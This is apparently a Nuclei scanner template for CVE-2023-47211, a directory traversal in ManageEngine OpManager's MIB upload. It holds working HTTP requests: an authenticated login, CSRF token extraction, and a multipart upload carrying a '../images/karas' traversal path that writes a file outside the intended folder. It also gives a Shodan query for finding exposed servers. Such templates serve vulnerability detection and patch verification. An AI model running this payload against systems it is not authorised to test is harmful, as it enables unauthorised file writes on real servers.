id: CVE-2023-47211 info: name: ManageEngine OpManager - Directory Traversal author: gy741 severity: high description: | A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851 - https://nvd.nist.gov/vuln/detail/CVE-2023-47211 - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N cvss-score: 8.6 cve-id: CVE-2023-47211 cwe-id: CWE-22 epss-score: 0.00164 epss-percentile: 0.52059 cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: zohocorp product: manageengine_firewall_analyzer shodan-query: "http.title:\"OpManager Plus\"" tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive http: - raw: - | POST /two_factor_auth HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded j_username={{username}}&j_password={{password}} - | POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 Host: {{Hostname}} X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}} Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262 -----------------------------372334936941313273904263503262 Content-Disposition: form-data; name="mibFile"; filename="karas.txt" Content-Type: text/plain ../images/karas DEFINITIONS ::= BEGIN IMPORTS enterprises FROM RFC1155-SMI; microsoft OBJECT IDENTIFIER ::= { enterprises 311 } software OBJECT IDENTIFIER ::= { microsoft 1 } systems OBJECT IDENTIFIER ::= { software 1 } os OBJECT IDENTIFIER ::= { systems 3 } windowsNT OBJECT IDENTIFIER ::= { os 1 } windows OBJECT IDENTIFIER ::= { os 2 } workstation OBJECT IDENTIFIER ::= { windowsNT 1 } server OBJECT IDENTIFIER ::= { windowsNT 2 } dc OBJECT IDENTIFIER ::= { windowsNT 3 } END -----------------------------372334936941313273904263503262-- - | POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 Host: {{Hostname}} X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}} Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262 -----------------------------372334936941313273904263503262 Content-Disposition: form-data; name="mibFile"; filename="karas.txt" Content-Type: text/plain ../images/karas DEFINITIONS ::= BEGIN IMPORTS enterprises FROM RFC1155-SMI; microsoft OBJECT IDENTIFIER ::= { enterprises 311 } software OBJECT IDENTIFIER ::= { microsoft 1 } systems OBJECT IDENTIFIER ::= { software 1 } os OBJECT IDENTIFIER ::= { systems 3 } windowsNT OBJECT IDENTIFIER ::= { os 1 } windows OBJECT IDENTIFIER ::= { os 2 } workstation OBJECT IDENTIFIER ::= { windowsNT 1 } server OBJECT IDENTIFIER ::= { windowsNT 2 } dc OBJECT IDENTIFIER ::= { windowsNT 3 } END -----------------------------372334936941313273904263503262-- host-redirects: true max-redirects: 3 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains(body, "MIBFile with same name already exists")' condition: and extractors: - type: regex name: x_zcsrf_token group: 1 part: header regex: - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' internal: true # digest: 490a00463044022065e6f603f0e38ded5d6d7d64b26a3c4f033fe991d1b0bd52647d1f06a8b848de02204921a44eff428087946e64109d72ce0cb050c7167e6d3b2fa2eded319790416b:922c64590222798bb761d5b6d8e72950